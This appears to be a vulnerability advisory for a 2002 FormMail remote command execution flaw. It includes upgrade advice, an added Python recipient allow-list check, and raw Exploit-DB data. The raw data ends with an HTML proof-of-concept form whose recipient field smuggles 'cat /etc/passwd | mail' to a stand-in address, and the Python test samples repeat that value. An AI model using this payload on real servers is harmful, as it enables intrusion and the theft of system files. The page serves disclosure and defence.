FormMail Remote Command Execution Vulnerability

Vendor: FormMail
By: SecurityFocus
CVSS: 8.8 (HIGH)
CWE: 78
Product Name: FormMail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2002-1300
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2002

FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user. A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, 'Matt Wright FormMail Remote Command Execution Vulnerability'. An attacker can craft a malicious HTML page with a form that submits to the remote FormMail script, and can include a command in the recipient field that will be executed on the remote system.

Mitigation:

Upgrade to the latest version of FormMail.
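
Where an upgrade has to be verified or supplemented, these are the checks a form-to-mail gateway needs in order to refuse the off-site form described on this page. This is an added example, not FormMail's own code; the allow-lists, the sendmail path and the function names are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumed site policy (hypothetical values): who may receive mail, and which
# hosts may serve forms that post to the gateway.
ALLOWED_RECIPIENTS = {"webmaster@example.org"}
ALLOWED_FORM_HOSTS = {"www.example.org"}
SENDMAIL = "/usr/sbin/sendmail"  # assumed mailer path

# One plain address only: no whitespace, quotes or shell metacharacters.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

class Rejected(ValueError):
    """The submission fails gateway policy."""

def check_submission(recipient, referer):
    """Return the mailer argv for an accepted submission, else raise Rejected."""
    # 1. The form must come from one of our own hosts. Referer is set by the
    #    client, so this is a secondary filter; step 2 is the real gate.
    try:
        host = (urlsplit(referer or "").hostname or "").lower()
    except ValueError:  # malformed URL in the header
        host = ""
    if host not in ALLOWED_FORM_HOSTS:
        raise Rejected(f"form host not allowed: {host!r}")
    # 2. Strict syntax check, then an exact allow-list match.
    if not ADDRESS_RE.fullmatch(recipient):
        raise Rejected("recipient is not a single plain address")
    if recipient.lower() not in ALLOWED_RECIPIENTS:
        raise Rejected("recipient not on allow-list")
    # 3. argv for subprocess.run(argv, input=body): no shell parses the address.
    return [SENDMAIL, "-i", "--", recipient]

# Constructed sample requests; the second uses the recipient value shown on this page.
SAMPLES = [
    ("webmaster@example.org", "http://www.example.org/contact.html"),
    ("me@mymail.host; cat /etc/passwd | mail me@mymail.host",
     "http://other.example/form.html"),
]

if __name__ == "__main__":
    for rcpt, ref in SAMPLES:
        try:
            print("accept", check_submission(rcpt, ref))
        except Rejected as err:
            print("reject", err)
```

The recipient value from the page fails the syntax check even when the Referer is spoofed to an allowed host, which is why the address checks rather than the Referer check carry the weight.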

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2080/info

FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user.

A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, "Matt Wright FormMail Remote Command Execution Vulnerability". 

<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host">
<input type="submit" name="submit" value="submit">
</form></body></html>